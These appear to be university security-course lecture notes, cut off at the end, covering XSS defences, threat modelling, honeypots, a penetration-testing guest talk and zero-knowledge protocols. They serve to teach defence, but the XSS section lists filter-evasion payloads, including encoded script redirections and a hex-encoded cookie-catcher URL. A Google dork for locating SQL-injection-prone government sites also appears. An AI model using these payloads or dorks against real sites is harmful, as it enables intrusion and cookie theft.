Escaping means making significant characters non-executable. For example, a user might leave a smiley on a forum such as " \(>.<)/ ", which contains < (the HTML tag delimiter). To stop this and other special characters from breaking pages, we need to escape them. Then, when browsers see the escaped characters, they display them as normal characters rather than interpreting them as HTML metacharacters. In this example, when you view the page source you will see &gt; instead of >, so the text will not be run as a script because there are no HTML tags.
" \(>.<)/ " => \(&gt;.&lt;)/
When an attacker tries to inject malicious code onto the forum, <script>alert('test')</script> becomes &lt;script&gt;alert('test')&lt;/script&gt; which will not get executed.
Filtering
If we are going to allow HTML input, we may want to allow only certain tags. Tags such as <BR>, <IMG> and <A HREF> are often necessary to users. We will block all potentially dangerous tags. E.g. the <PLAINTEXT> tag is something we would want to block: if you were on a message board and an attacker inserted a <plaintext> tag, the whole thread would get turned into plain text when the next user views it.
When we parse the HTML, we first see which tag it is. If the tag is allowed, we find the first >, strip the attributes out, and reconstruct our own clean tag containing only the attributes we want to permit. This prevents an attacker injecting malicious code after (or in) permissible tag attributes.
E.g. <img src= <%Response.Write(Request.QueryString('nextimg'))%>
If Request.QueryString('nextimg') evaluates to http://www.dynamicdrive.com/cssexamples/media/uplift.jpg> <script>alert then the tag will look like <img src= http://www.dynamicdrive.com/cssexamples/media/uplift.jpg> <s
We first see that it is an image tag, which is on our granted list. Then we find the first >. We grab src= http://www.dynamicdrive.com/cssexamples/media/uplift.jpg, validate it (see Input Validation) and put it into our own clean img tag:
< img src= http://www.dynamicdrive.com/cssexamples/media/uplift.jpg>
This prevents an attacker injecting malicious code in attributes.
Input Validation
In the image tag example, we have to validate whether the attribute is valid. For an image, allowed formats are .jpg, .png, etc. Deny anything with dodgy extensions such as "php" or "js". This is just validating the input to see if it is in the expected format. For example, if the form field is for a phone number, we expect an 8 digit number with no text, spaces, punctuation or anything else. If anything doesn't match the expected format, throw an error.
Eliminating Scripts
It is IMPORTANT and a MUST to eliminate scripts from input, including tags, attributes and any links. Scripting is very dangerous:
<body onLoad=" function ha(){alert('*Yawn*..me tired') }; ha();">
Once you can write code, write functions and call functions, you can do anything. To reduce the risk of having the script identified as malicious, the attacker might encode it with a different encoding method. There are always other ways to get around keyword filters, escapes, and other filtering techniques. The only way to be safe is to eliminate all scripting. Here are some examples where things will fail:

<script>a='navi';b='gator.userAgent';alert(eval(a+b))</script>
javascript:do%63ument.lo%63ation="http://www.yahoo.com"
The unicode equivalents \u0022 and \u0027, e.g. alert("\u0022") or alert("\"")
Encoding a URL in hex so it looks less suspicious: cookiecatcher.php becomes %77%77%77%2E%61%62%63%2E%63%6F%6D%2F%63%6F%6F%6B%69%65%63%61%74%
String.fromCharCode(): with the attack script <script>document.location="http://www.yahoo.com"</script>, PHP's magic quotes mean we'll actually get <script>document.location=\"http:ajsdasdas.com\"</script>. To get around this, we can use String.fromCharCode(): <script>document.location=String.fromCharCode(104,116,116,112

Cookie Security (straight from wiki)
Besides content filtering, other methods for XSS mitigation are also commonly used. One example is that of cookie security. Many web applications rely on session cookies for authentication between individual HTTP requests, and because client-side scripts generally have access to these cookies, simple XSS exploits can steal these cookies. To mitigate this particular threat (though not the XSS problem in general), many web applications tie session cookies to the IP address of the user who originally logged in, and only permit that IP to use that cookie. This is effective in most situations (if an attacker is only after the cookie), but obviously breaks down in situations where an attacker is behind the same NATed IP address or web proxy. IE (since version 6) and Firefox (since version 2.0.0.5) have an HttpOnly flag which allows a web server to set a cookie that is unavailable to client-side scripts. While beneficial, the feature does not fully prevent cookie theft, nor can it prevent attacks within the browser.
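Three of the server-side defences from this section (escaping, input validation and the HttpOnly cookie flag) can be sketched with Python's standard library. The helper names, the 8-digit phone rule and the extension whitelist are assumptions drawn from the examples in the text; this is an illustration, not a complete XSS filter.

```python
import html
import re
from http.cookies import SimpleCookie

PHONE_RE = re.compile(r"\d{8}")             # exactly 8 digits, nothing else
ALLOWED_IMAGE_EXTENSIONS = (".jpg", ".png")  # assumed whitelist


def escape_for_html(user_input: str) -> str:
    """Escaping: turn HTML metacharacters into entities so they display as text."""
    return html.escape(user_input, quote=True)


def is_valid_phone(value: str) -> bool:
    """Input validation: accept only the expected format, reject everything else."""
    return PHONE_RE.fullmatch(value) is not None


def is_allowed_image_url(url: str) -> bool:
    """Accept a src value only if it ends in a whitelisted extension
    and contains no tag delimiters, quotes or whitespace."""
    if re.search(r"[<>\"'\s]", url):
        return False
    return url.lower().endswith(ALLOWED_IMAGE_EXTENSIONS)


def session_cookie_header(session_id: str) -> str:
    """Cookie security: mark the session cookie HttpOnly to hide it from scripts."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True
    return cookie.output()


smiley = escape_for_html(r"\(>.<)/")
attack = escape_for_html("<script>alert('test')</script>")
good_url = "http://www.dynamicdrive.com/cssexamples/media/uplift.jpg"
bad_url = good_url + "> <script>alert"
header = session_cookie_header("abc123")
```

Note that html.escape with quote=True also escapes quote characters, so the escaped attack string contains entities for the single quotes as well as for < and >.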

User Defense
A user can help reduce their susceptibility to an XSS-style attack:
1. Disable scripting when it is not required.
2. Do not trust links to other sites in e-mail or on message boards. They may contain malicious code with damaging potential.
3. Access any site involving sensitive information directly through its address and not through any third-party sites.
4. Get a list of attacks and the sites and boards they happened on, and be careful if you need to visit one of them.

Week9/NiceNotes
Threats

Security Engineering Guideline


The following list is a systematic approach to Security Engineering.
1. Assets - Identify the assets you are trying to protect
2. Threat Model - Decide the context you are operating in: general sources of threats, power and motive of attackers
3. Enumerate Threats - Detail the threats against these assets
4. Risks - Assess the risk of each of the threats
5. Policy - Determine a policy that best deals with the risks
6. Implementation - Implement the policy
7. Testing - Test the policy/implementation
8. Training - Train all staff so that they know the policy, and how to react should an attack occur

Assets
Listing the assets is the important first step in any security engineering exercise. You can only effectively defend something if you know exactly what it is that you are defending. It is very important to make a comprehensive list of assets before you start to identify the risks and implement a security policy.
Example: Listing the assets for a home
Obvious Assets
  Valuable items
  Items of sentimental value
  The people in the house
  Sensitive data stored in the house
  The house itself
Not-so-obvious Assets
  The sense of security (the feeling of safety within your house, which would be lost if there had been a break in)
  The inconvenience of getting your insured items back
Example: Listing the assets for an ISP
Obvious Assets
  Hardware
  Bandwidth
  Customer lists
Not-so-obvious Assets
  Credibility
Possible threats
  Staff leaking or abusing customer information
  Other companies stealing and then selling the bandwidth
These less obvious assets are often overlooked, and are often more important than the more obvious assets.

Threat Models
ISP
assets: hardware, bandwidth, customers, customer data, credibility, reputation
threat model: staff can steal assets or bandwidth, sell customer lists, etc.
Internet Banking
assets: money, credibility, money, Money, MONEY!
threat model: staff (stealing), flaws in software, hackers obtaining information or ruining records, etc. Developers of the system can see flaws and exploit them.
Network Forensics

Common Threat Classes
This is a non-comprehensive list of some of the common threat classes, not a thorough checklist. Your threat model should include (but is not limited to) the following classes of attacks:
Users
  Unintentional attacks (by frustrated or stupid users)
  Malicious attacks
Attackers
  Casual attackers
    Do not target this victim specifically
    Attack the victim while scanning many other targets
  Determined attackers
    Target the victim
    Have a motive against the victim
    Try to find vulnerabilities of the victim
  Funded attackers - like determined attackers, but also:
    Perform reconnaissance
    Hire people and purchase equipment to perform the attack
Natural disasters / accidents
Errors and Failures
  Mechanical
  Human: Humans have specific abilities and inabilities at performing tasks, which should be considered when determining the risk of the humans failing in their task. In particular, humans are good at performing tasks that are:
    Simple
    Familiar or Common - Humans are more likely to notice and fix mistakes if they are familiar with the task and the feedback that results from it
    Motivating, but without pressure - Motivated humans are likely to put in more effort to prevent failures. Under pressure, though, humans do not act rationally, and ignore warning signs.
    Giving clear feedback - Humans are good at analysing feedback in order to prevent failures
  What happens when the red light goes on for the first time?
    Ambush - run towards the people who are ambushing you; this might cause them to panic, since they probably won't expect you to run towards them
    Minefield - all freeze and wait for help to come
    Ambushed & Minefield - run towards the attackers; some may be killed by mines, but all will be killed by the ambushers if they freeze
Change
  Environmental (e.g. bank keycards, online apps)
  Organisational (e.g. new systems, merger or takeover)
  Requirements (e.g. millennium bug)

Threat trees
Example: tunnel revenue
Schneier calls these Attack Trees

Dealing with threats
The greatest threat to security engineering is humans. How do we defend against people going bad? Who will watch the watchers?
Solution: DUAL CONTROL
This involves distributing trust, by requiring 2 or more independent people to go bad before the system can be compromised.
Examples of Dual Control:
1. Double entry used in book keeping - Credits and debits are entered by 2 separate people. Because total credits must equal total debits, if they don't balance out then it is apparent that at least one person has been compromised.
2. Ice cream shop - An ice cream shop required customers to pay for tickets at the cashier first, before swapping the tickets at the ice cream service place. The staff are told that this is for hygiene purposes. The real reason is security. At the end of the day, the number of tickets sold at the cash register must equal the number of tickets collected at the ice cream service place. This is a dual control.
3. Government - The Australian government's powers are separated into 3 groups: legislature, executive and judiciary. The three groups were originally kept independent of each other, so that each group can check the other groups without being interfered with or influenced by them. Under the Howard government, the legislature has gained significant power over the judiciary, being able to sack the judiciary and decide its salaries. This has definitely impacted on the judiciary's ability to carry out unbiased checks and balances on the legislature.
Do countermeasures actually reduce the real threat and/or its impact?
Does this reduction improve the security of what you want to protect?

A Zero Knowledge Protocol is an interactive method for one party to prove to another that a (usually mathematical) statement is true, without revealing anything other than the veracity of the statement.

Example: A man and a woman reach a circular cave that has a password-secured door. The woman knows the password and wants to sell it to the man. The man wants to buy it but must first verify that she really knows it. The woman needs to prove this to him without telling him the password, hence a zero knowledge protocol.

Solution: The woman goes down either side of the cave without the man seeing which one. The man then asks her to come out of a particular side, and she does so, passing through the door if she has to. Without the password she could only comply when she happened to have picked the requested side, which is half of the time, so a bluffer survives n repetitions with probability 1/2^n. By repeating this many times, the man will be convinced she knows the password, as she has appeared out of the right side each time he asks.

Proof: If a video recorder captured the whole process, the man would be convinced that the woman knows the password. However, no one else would gain anything from the video, because the man and woman could together produce a fake video that is indistinguishable from a real one.
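The cave example above can be simulated to see how quickly a bluffer's luck runs out. This is only a minimal sketch: the function names and the "left"/"right" labels are invented for illustration and are not part of the notes.

```python
import random


def run_cave_round(knows_password, rng):
    """One round: True if the woman comes out of the side the man asks for."""
    entered = rng.choice(["left", "right"])    # she picks a side unseen
    requested = rng.choice(["left", "right"])  # he calls a side at random
    # With the password she can always cross the door; without it she
    # only succeeds when she already stands on the requested side.
    return knows_password or entered == requested


def convinces(knows_password, rounds, rng):
    """True if she passes every one of `rounds` consecutive rounds."""
    return all(run_cave_round(knows_password, rng) for _ in range(rounds))


def bluff_success_rate(rounds, trials=10_000, seed=0):
    """Estimate how often someone WITHOUT the password survives all rounds."""
    rng = random.Random(seed)
    wins = sum(convinces(False, rounds, rng) for _ in range(trials))
    return wins / trials
```

Calling bluff_success_rate(1) should give a value near 0.5, and each extra round should roughly halve it, which is why the man only needs a few dozen repetitions to be convinced.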

Honeypot
What is a honeypot
It is a trap set to detect, deflect, or in some manner counteract attempts at unauthorized use of information systems. It is basically some fake data on a system or a fake system on a network, or a fake network altogether which shouldn't receive any traffic from normal users. So if these honeypot data/systems receive traffic then an intruder is in the system/network.
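The idea above (something that should never receive traffic, so any traffic is suspicious) can be sketched as a listener on an otherwise unused port. This is an illustrative assumption about how one might do it, not a tool from the lecture; the function names and the log record layout are hypothetical.

```python
import socket
import threading
from datetime import datetime, timezone


def open_listener(host="127.0.0.1", port=0):
    """Bind a TCP socket on an unused port (port 0 lets the OS pick one)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen()
    return srv


def log_connections(srv, log, max_connections=1):
    """Accept connections, record who connected, and never talk back."""
    for _ in range(max_connections):
        conn, (peer_ip, peer_port) = srv.accept()
        with conn:
            # Nobody legitimate should ever connect, so every entry is an alert.
            log.append({
                "time": datetime.now(timezone.utc).isoformat(),
                "peer_ip": peer_ip,
                "peer_port": peer_port,
            })
    srv.close()
```

Running log_connections in a background thread (for example with threading.Thread) keeps the trap passive: it records the source address of each connection attempt and sends nothing back.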

Types of honeypots

Honeytokens
Honeytokens are honeypots that are not computer systems. In other words, a honeytoken is some type of digital entity (not a whole computer system), such as a credit card number, a spreadsheet, or even a fake login, that defenders want attackers to interact with. They are generally used not to monitor an attack in progress, but to determine whether an attack has taken place.
Example: A file on a PC that shouldn't receive any form of interaction (e.g. reads or writes to the file) has been modified. This means an intruder has accessed or modified the file in some way.

Honeynets
Conceptually, these are a network of one or more honeypots. They function in the same way as a normal honeypot, but at a larger scale.
Example: Honeynets can be made up of low or high interaction honeypots, such as a network of HoneyD honeypots. However, in the real world, honeynets typically use high interaction honeypots such as real system honeypots.

Honeypot Clients
Unlike other honeypots, which passively wait to be attacked, honeypot clients actively look for attackers; in this case, for malicious servers that attack clients.

High interaction
These are honeypots that do not emulate anything: they are real systems with entire operating systems and applications. Because they use real systems, high interaction honeypots can capture vast amounts of information and provide the attacker with an environment where they can gain access to the operating system and perform their malicious tasks. Once the attacker is within the honeypot, the defender can do things such as:
- capture the attacker's rootkits as they are being uploaded into the system
- capture their keystrokes
- monitor communications between the attacker who is attacking the system and other attackers
This lets defenders find out the attackers' motives, skill levels, organisation and other critical information.
Another advantage of high interaction honeypots is that they can be used to detect new types and forms of attacks and exploits. Additionally, they can be used to distract intruders from other, sensitive systems.
However, all the advantages that high interaction honeypots provide come at a price. Since they run real operating systems, attackers can use these honeypots to perform attacks on non-honeypot systems. Also, setting up and managing high interaction honeypots is complex: the defender has to configure all the services on the system and set up logging or whatever else the honeypot is being used for. Further complexity is added when the defender attempts to minimise the risk of the honeypot becoming a part of the attacker's attacks.

Example:
- Virtual-world: VMware running a virtual operating system
- Real-world: undercover police/agent

Low interaction
Low interaction honeypots are systems that emulate real-life systems and services and log the activity associated with them. The advantage of this is that the attacker's activities are contained to what the emulated services can do. In most cases, attackers will be limited to connecting to the honeypot and executing a few commands (compared to being able to run all available commands on a real system). These types of honeypots are typically easier to set up and run. They also usually come preconfigured or preloaded with extra modules and options which emulate various systems and services.
Unlike high interaction honeypots, low interaction honeypots carry a lower risk since the attacker is contained within the emulated system/service. This means that attackers have no real operating system to upload rootkits to and no real services to break into.
Unfortunately, the limits imposed on the attacker also limit the amount of information that low interaction honeypots can gather. Another drawback is that the emulated services only work well with known or expected behaviour and actions. When unknown or unexpected behaviour is encountered, the honeypot's ability to understand, respond and capture decreases.
Example:
- Virtual-world: HoneyD
- Real-world: hidden security system (e.g. hidden security cameras, tamper alarms, etc.)

Uses of Honeypots
Research
Research honeypots are used as a research tool.
- they gather information about the motives and tactics of the Blackhat community targeting different networks
- they do not add direct value to a specific organisation
- they research the threats organisations face, to learn how to better protect against those threats
- they are complex to deploy and maintain, capture extensive information, and are used primarily by research, military, or government organisations

Production
Production honeypots strengthen an organisation's security system. Their main aim is not to prevent intrusion but to act as a support system to other security systems.
- used in companies/organisations
- capture only limited information
- placed inside the production network, alongside other production servers, by an organisation to improve its overall state of security
- help mitigate risk in an organisation
- add value to the security measures of an organisation, for example using honeyd on unused IP address space to create fake systems that detect and distract intruders

Detection
- Used with IDS response
- Examples: having fake systems on the network that should not get activity, Bait Cars (presidential limos)

Deterrent
- Examples: Car Alarm LED, Alarm Stickers, Fake Cameras

Distraction
- Have the attacker play with the fake honeypot while you take defensive measures
- Examples: Bait Car under attack

Discovery of Honeypots
- Social Engineering
- OS Fingerprinting
- Response Times
- Assembly code

Honeyd
Honeyd is a daemon (background service) that runs virtual hosts over a network. It can be configured to simulate multiple servers and network devices on a network. Honeyd allows one host to claim multiple IP addresses in order to simulate network devices.

Honeyd has two main purposes:

To detect intruders
- Say you have a handful of real devices on a network, e.g. 2 servers and a printer
- Honeyd can be used to spawn many fake servers and printers on the same network using the unused IP addresses
- These can be configured to merely log traffic
- An intruder may try to access these fake devices, and honeyd will log the activity
- These devices should not receive any real traffic, so if they do receive traffic, that means an intruder is in the network

To distract intruders
- Again you have honeyd spawn a bunch of fake servers and other devices
- Configure these fake devices to respond like legitimate devices
- The intruder sees many servers and printers and they all look real
- The intruder will need to find out which server is a honeypot in order to avoid being trapped
- This buys the company time to take defensive measures such as backing up files, closing ports and moving files away

Honeypot at Home: Log file
Remember Richard's sniffer at home? That's a honeypot: a PC set up to log and not interact with anything.

Out of curiosity and epic boredom I decided to see what happens to an undefended XP system (yes, I need to get out more). So, I set up one system at home to see if anything was trying to access my system for no legitimate reason.
- It was running Windows XP (SP0), with shared files and folders, and the XP firewall turned off
- I installed Wireshark on it and hooked it up directly to the internet (modem into network card)
- Most of the traffic is DHCP; the machine, from what I make of it, seems to broadcast its existence continuously
- I started IE6 (which loaded the runonce MS page by default) and then went to Google
- In about 5 to 10 minutes, NetSendMessage issued a command to my computer to display a popup
- Within 10 minutes I was attacked by what looked like the Blaster worm (or at least I think it was). My computer was forced to shut down in 1 minute
- When it restarted, I received more spam pop-up messages and another shutdown command
- I installed XP SP3; this time I did not get any pop-up messages or any worms. I still got the packets trying to activate the spam messages, but no pop-ups were seen, though it was only left running for half an hour, because I got bored and wanted to use the internet...
- Then I decided to run the system with XP SP0 while I was at uni, and for some reason I did not get any forced shutdowns
- Before setting up the system I was expecting to be forced to shut down within 5 minutes of using XP SP0 on the internet (this happened frequently back in the old days when the Blaster worm was set loose)
- When I read up on the Sasser worm on Wikipedia, it mentioned ISPs filtering out these worms
- I reckon that such infrequent attacks by Blaster/Sasser on my system are probably due to a decline in the use of XP SP0, as MS doesn't support SP0 any more

Setting something like this up at home is quite easy:
- just get any random old computer off the streets
- install your favourite operating system on it
- hook it up to your modem
- let it run for an hour

My WS log

Week11/NiceNotes
What is it like to work as a penetration tester?
- penetration testing
- auditing for PCI
- high level policy reviews
- product security assurance testing

Guest speaker: Fionnbharr Davies (Securus Global), graduated last year from CSE

Penetration testing
Companies hire us because they have to be secure! For example:
- Banks providing credit card services are required to meet PCI (Payment Card Industry) compliance.
- Medical companies

In the real world, no one likes to have their security checked and tested. They only do it because they have to! Many companies just want to be scanned for vulnerabilities on their IPs and firewalls.

Other: sometimes hired for incident response
- malware
- Microsoft SQL Server stack overflow

What companies care about:
- Consequences of the vulnerability
- Likelihood of it being exploited
- Whether it is fixable, and if so, the cost of fixing it
Clients are often security teams in the companies, who spend most of their days liaising with various departments but get very little done.

What penetration testers care about:
- How to exploit the systems?
- What are the vulnerabilities?

Types of penetration testing jobs
- PCI compliance (too boring to talk much about it)
- Web apps (the majority of jobs)
  - check the app out and find vulnerabilities
  - many contain easy-to-find holes, e.g. XSS and SQL injection. For example, a quick search on Google using "inurl:select inurl:where site:gov" reveals a bunch of government sites potentially vulnerable to SQL injection
  - web app developers are lazy and usually forget to parametrise input fields. For example, a web app uses JavaScript to get the user's IP and user name, then stores the info in a cookie <= can easily inject XML to modify the user name
- Reverse engineering: rare, mainly involves malware
- Network penetration testing
  - needs lots of knowledge about networks and current vulnerabilities; joining a mailing list and reading it is a great way to keep up to date
  - internal web apps on servers can usually be exploited to give root access
  - often you can take one thing and use it as leverage elsewhere. For example, take a user name for one app and try to brute force it on another application on the same server, or on a server on the same local network; most of the time, it will give you access
- Application/software reviews
  - Example: a gas station has a number plate scanning program, which can be exploited by scanning SQL injection code printed on a number plate
  - "Security software" is often written by developers who just happen to write security software. In other words, don't trust anything!
  - Example: format string bugs. printf has known vulnerabilities around the % sign: if you allow users to specify custom formats that are passed to printf, you are exposed. %x reads the next value off the stack, so it can be used to dump anything you want! %n writes to arbitrary spots ...
  - Classic case: a server that allows you to telnet to it, which can then be exploited using format strings to let you take over the machine

For a penetration tester, once you've penetrated the system it's game over!

The iPhone job
Concern: "What data can be pulled off if you lose the iPhone?"
Answer: (in short) Everything!
Some vulnerabilities:
- dynamic keyboard cache (.dat file): stores everything you've typed in the past few days. Yes, passwords are stored!!
- it keeps track of everyone you've called and all of your photos
- every time you push the big round button at the bottom or use zoom, it takes a screenshot of your display and stores it!
- upon deletion, objects are not removed, merely marked as being 'deleted'
- the PIN can easily be bypassed: it's stored in a file
- if you would like to try and confirm this, try searching for files using the magic numbers in file headers. Common examples: %PDF for PDF files, ELF for ELF files

How do clients establish trust with Securus Global?
- if anything goes wrong, they will look to the company first
- reputation: the company has been around for a while
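The magic-number search mentioned in the iPhone notes above can be sketched as follows. The two signatures are the well-known PDF and ELF header bytes; the table and the function names are illustrative assumptions, and a real forensic tool would carry a far larger signature list.

```python
# Well-known file signatures ("magic numbers") found at offset 0.
MAGIC_NUMBERS = {
    b"%PDF": "PDF document",
    b"\x7fELF": "ELF executable",
}


def identify(header: bytes) -> str:
    """Return a file type name based on the first bytes of a file."""
    for magic, name in MAGIC_NUMBERS.items():
        if header.startswith(magic):
            return name
    return "unknown"


def identify_file(path: str) -> str:
    """Read only the first few bytes of `path` and classify them."""
    with open(path, "rb") as f:
        return identify(f.read(8))
```

Because the check looks at content rather than the file name, it still works on data that has been renamed, or on blocks recovered from storage that were merely marked as deleted.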

Fuzzing
- random data is generated and fed directly into a program, the aim being to cause a crash
- a simple and effective way to expose vulnerabilities, e.g. buffer overflows
- sometimes it can get fairly complex: block-based fuzzing, e.g. of Samba
  - break things into blocks, e.g. header, data 1, data 2, etc.
  - given the length field info and a block of data, use fuzzing engines (e.g. Sulley, Spike) to generate data feeds
  - allows you to be selective about what you want to fuzz
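A minimal sketch of the random approach described above, assuming a toy target: parse_record is a hypothetical parser with a deliberately planted bug (it trusts its length field), and fuzz is an illustrative harness, not the Sulley or Spike API.

```python
import random


def parse_record(data: bytes) -> bytes:
    """Toy target: first byte is a length field, the rest is the payload."""
    if not data:
        raise ValueError("empty input")
    length = data[0]
    payload = data[1:]
    # Planted bug: the length field is trusted and never checked
    # against the real payload size.
    return bytes(payload[i] for i in range(length))


def fuzz(target, rounds=1000, max_len=16, seed=0):
    """Feed random byte strings to `target` and collect unexpected crashes."""
    rng = random.Random(seed)
    crashes = []
    for _ in range(rounds):
        size = rng.randrange(max_len + 1)
        data = bytes(rng.randrange(256) for _ in range(size))
        try:
            target(data)
        except ValueError:
            pass  # a clean rejection of bad input is not a finding
        except Exception as exc:
            crashes.append((data, repr(exc)))
    return crashes
```

In Python the planted bug surfaces as an IndexError; in a C program the same mistake would be an out-of-bounds read, which is the kind of fault fuzzing is meant to shake out. A block-based fuzzer would instead keep the header well formed and mutate only the length field or the payload.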

Open source vs Closed source


- 64 bit OS: makes exploitation a lot harder
- many applications haven't been attacked yet; that doesn't mean they are not vulnerable
- for a black hat, it is always about the economy
- Mac OS has a format string vulnerability
- the stack should be made either writable or executable but not both
  - this can be bypassed by a return-to-libc attack

Universities are 5 years behind


- BH/DC talk on ret-to-libc
  - search for pop and ret in disassembled code
  - jump to various places using pop and ret, to create a little program on top of a big one

Miscellaneous
- Ubuntu remote root access bug
- Red Hat backporting vulnerability

Conclusion
- You are always owned!
- Don't trust anyone!
- Hackers always have access to the source code
- Usability is the opposite of security

For those who are interested in security, check out the papers and presentations on Immunity. In particular:
- The hacker strategy, March 28, 2008
- IO immunity style, Feb 29, 2008
- insecure.org & internet superheroes

Protocols (continued) and policy


Encryption schemes, keys and hash functions are called primitives. These primitives are the building blocks for secure systems when they are bound together using appropriate protocols.

Non-repudiation
You cannot take anything back. This is a property of a protocol whereby:
- Everyone can clearly see what is going on
- If the protocol fails (e.g. authentication), everyone can see that it fails
- If the protocol succeeds, everyone can see that too
- You cannot change the status of the success or failure after the fact

Protocols of Election: Properties


The question: What properties would you require in an electronic voting system?
Answer:
- Verify each person voted
- Cannot identify who voted for which candidates
- Ensure each person voted once
- Ensure only eligible people voted
- Ensure each vote was counted once
- Preserve anonymity
- Verify the result of the election was correct
- A vote is counted, and counted once only
- Results must be verifiable by a third party

Example: Requirements for a protocol
Question: Colonel Jack O'Neill has become invisible (technically 180 degrees out of phase). To be able to be seen again he needs to communicate with the members of SG-1. The only person who can see Jack is an untrusted 3rd party; let's call him Bob. What properties do you need in a protocol to ensure that Jack can communicate with the SGC?
Answer:
- Authentication: you can verify that it is Jack
- Integrity: the message cannot be changed in transit
- Confidentiality: Bob cannot understand the contents of the message
- Non-repudiation??
Pre-shared knowledge resolves the authentication issue, e.g.
C: "What did we do last week?"
A: (via Bob) "We went skiing with one leg tied behind our back!"

Flaws in the Australian election
- Everyone can get a copy of every vote on a DVD
- Flaw: you can work out whether someone has voted for a candidate. E.g. they vote for xxx, then number the other 50 candidates in a certain way; the chance of someone else in Australia using the same arrangement is low!

Example 2: 2005 final exam, q3
Properties of the protocol:
- authentication
- non-repudiation
  - the protocol must be fair to both sides
  - if the medium did contact Houdini, then there is no way Bess can deny it
  - if the protocol failed, then the medium cannot have contacted Houdini
  - neither party can back away from the truth
  - this is the major difference between this and Example 1
- you may also mention integrity and confidentiality, as long as you can justify them

Possible protocols:
- pre-shared secrets, say an envelope with 10 keys
  - what if you had 10 fake mediums and one real one?
- the secret is held by a trusted third party
  - for non-repudiation, the 3rd party must review each secret key as it is tested and say whether it is correct or not
- something they have
  - a lead box of 50 dice; shake it and let the medium guess
- a time bomb on Bess; only Houdini can tell the medium how to defuse it
  - what if the medium is a fake?
  - what if the medium doesn't pass on the solution?

This question really wanted you to come up with something that shows you've thought about the issues involved and are tackling them.
More on repudiation
If Richard will give you a HD, you will give Richard a big bribe.
- Richard: hashes a document saying he will give you a HD, and produces document' by signing the original and the hash with his private key
- You: hash the document and decrypt document' using Richard's public key, then check that the two hashes match
- This provides integrity but no non-repudiation: Richard can claim that his private key was stolen

Adobe updater
- update servers can be faked using tools available on the net which exploit the latest DNS spoofing vulnerability

Zero-Knowledge Protocol
A Zero Knowledge Protocol (aka 0K protocol or ZK protocol) is essentially a protocol that allows one party (the Prover) to prove the validity of an assertion to another party (the Verifier) without revealing anything else. In particular, a third party observing the protocol should not be able to obtain any of the information involved. After the protocol is enacted, no one should have learnt anything apart from what the protocol set out to prove.

It is guaranteed that no extra info leaks out:
- no one can learn anything extra apart from what we want to get through
- no side channel attacks (i.e. attacks on extra information leaked) can be launched

Proof: If the communication between the two parties could be faked such that an observer could not tell the difference from a real run of the protocol, then no knowledge is given away by the protocol.

It is also important to realise that Zero Knowledge protocols involve an asynchronous relationship between the Prover and the Verifier. As well as a third party not being able to gain any extra information, the Verifier should not be able to obtain any more information than the Prover intends.

0K protocols are probabilistic (rather than deterministic) in nature. That is, the Verifier asks a number of questions whose answers depend on the Prover knowing some information. If the Prover answers them all correctly, the likelihood of them not knowing the information in question is negligible. On the other hand, if the Prover does not know the information, it is unlikely that they will be able to answer all of the Verifier's questions correctly.

In terms of 0K protocols, we are mainly concerned with Passive Cheaters, as they are the most difficult to prevent from accessing information. So we basically want to ensure that the protocol cannot leak any information that a passive cheater could get their hands on.

Why must the transcript of the protocol be fakable? (This is just stating the above again in a different way.)
So that we can prove that no extra information is leaked. If the transcript is fakable, then no transcript of the protocol can possibly convince anyone of anything, because when you look at a transcript you cannot determine whether it is real or not. Therefore a transcript does not leak any information. If it is NOT fakable, then a transcript of an honest Prover may be distinguished from a transcript of a cheating Prover. While the real transcript still proves the claim, we can no longer prove that it leaks no extra information.

Transcript of protocol
A transcript of a protocol is a record of the interactions that occurred during the protocol.

Modes of operation
There are a few ways in which 0K protocols can work:

Interactive
This is where the Prover and the Verifier go through the protocol one step at a time and then repeat the process until the Verifier is satisfied. Most of the examples in the following notes are of this form.

Parallel
This is where the Prover creates a number of problems and the Verifier asks for a number of solutions at the same time. This saves time compared to the interactive mode, since you do not have to go through the steps one after the other.

Offline
This is where the Prover creates a number of problems and puts them and the data through a public one-way hash function. The output of the hash is then used in place of the Verifier's random choices to decide which solutions are required. This effectively automates the role of the Verifier. The Prover can then attach their solutions to the message.
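The offline mode described above replaces the Verifier's random questions with the output of a public hash. A minimal sketch, assuming SHA-256 as the public one-way function and one challenge bit per problem; the function name and the length-prefixed encoding are illustrative choices, not taken from the notes.

```python
import hashlib


def derive_challenges(message, commitments, rounds):
    """Turn the message and the Prover's problems into challenge bits.

    Anyone can recompute the bits from public data, so the Prover cannot
    pick the challenges without also changing the problems.
    """
    if rounds > 256:
        raise ValueError("SHA-256 yields at most 256 challenge bits")
    h = hashlib.sha256()
    # Length-prefix every field so different splits hash differently.
    h.update(len(message).to_bytes(4, "big") + message)
    for c in commitments:
        h.update(len(c).to_bytes(4, "big") + c)
    digest = h.digest()
    # Bit i of the digest decides which solution is required in round i.
    return [(digest[i // 8] >> (7 - i % 8)) & 1 for i in range(rounds)]
```

The Prover would publish the message, the problems and the solutions selected by these bits; a checker recomputes the hash and verifies each solution without any interaction.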

Example
Let's suppose you knew how to create a website so that it would get to the top of Google PageRank, and now you want to sell this as a service to your clients. Your clients may not believe you, and may want proof that you can actually get to the top of PageRank before they give you any money. One way to show them that you can do what you claim would be to create a website that demonstrates it. But once you show this to your clients, they may be able to get some extra information from it (such as what you have included in the page) which may help them do the same thing on their own, without having to pay you. Clients who did this could be considered passive cheaters. You want to be able to prove to people that you can do what you claim, but without giving them any extra information. This is where 0K protocols come in.

Example
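Given 2 graphs, prove they are isomorphic without revealing the isomorphism. E.g. P has a graph G and V has a graph T. V will give P a billion dollars if P can prove G is isomorphic to T. P does not want to reveal the isomorphism to V.
1. P takes G and applies a random transformation a to produce G'. G' can then be transformed to T by applying transformation b. P shows G' to V.
2. V asks to see either a or b (but not both) and checks that it maps G to G', or G' to T, respectively. Seeing both a and b for the same G' would reveal the isomorphism.
3. Repeat steps 1 and 2, each time with a new isomorphic G'.
Note: a transcript can easily be faked by someone who knows the challenge sequence (e.g. ababbaaaabbb) in advance and produces each G' accordingly: from G when a will be asked for, and from T when b will be asked for. A 3rd party therefore cannot tell whether the sequence is a fake. G and T are not secrets.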
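One round of the graph protocol above can be sketched as follows. Graphs are represented as sets of undirected edges and transformations as vertex relabellings; the function names, and the fact that Prover and Verifier run inside a single function, are simplifications made for illustration.

```python
import random


def apply_perm(edges, perm):
    """Relabel every vertex v of an undirected graph as perm[v]."""
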